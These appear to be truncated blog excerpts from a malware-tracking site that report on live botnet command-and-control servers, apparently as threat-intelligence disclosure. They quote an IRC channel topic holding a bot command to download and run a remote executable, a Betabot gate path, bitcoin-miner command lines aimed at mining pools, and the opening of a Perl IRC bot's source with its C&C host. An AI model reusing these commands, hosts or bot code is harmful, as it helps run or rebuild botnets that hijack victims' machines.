Resolved thebankslife.no-ip.biz to 72.20.28.232 Server: thebankslife.no-ip.biz Port: 6667 Channel Users Topic #sexlyfe 2 [+nt] #Syncrude 78 [+sntVCT] !download hxxp://nassau03.nl/russiabm.exe 5 #bankslife 35 [+nt] .gtfo Channel: #Syncrude Now talking on #Syncrude Topic for #Syncrude is: !download hxxp://nassau03.nl/russiabm.exe 5 Topic for #Syncrude set by test (Fri Aug 09 00:17:01 2013) Bitcoin mining info: macromedia.exe” -a scrypt -oRead more...
bitcoinglobalbanking.com (Betabot http botnet hosted by leaseweb.com)
Resolved bitcoinglobalbanking.com to 82.192.92.5 Server: bitcoinglobalbanking.com Gate file: /b/order.php Alternate domain: bitcointradingdepot.com This botnet wasn’t actually mining bitcoins when I checked it. I’m very surprised. Hosting infos: http://whois.domaintools.com/82.192.92.5 Related md5s (search on malwr.com to download the samples): Beta bot bbfdbd53810751401b720641687a6116 EDIT: It finally started bitcoin mining Mining infos: macromedia.exe” -a scrypt -o http://mine.pool-x.eu:8080 -u jc2244.crRead more...
EpicBot v1.0 by h22turbo(hosted in United Kingdom Derby Webfusion Internet Solutions)
Perl bot found by Yewnix my @adms=(“Darkone”);my @canais=(“#dark7887”);my @nickname = (“DARK”);my $nick = $nickname[rand scalar @nickname];my $ircname =’dark’;chop (my $realname = `uname -a`);$servidor=’dark86.no-ip.org’ unless $servidor;my $porta=’7000′; Source EpicBot hosting infos: http://whois.domaintools.com/91.109.4.212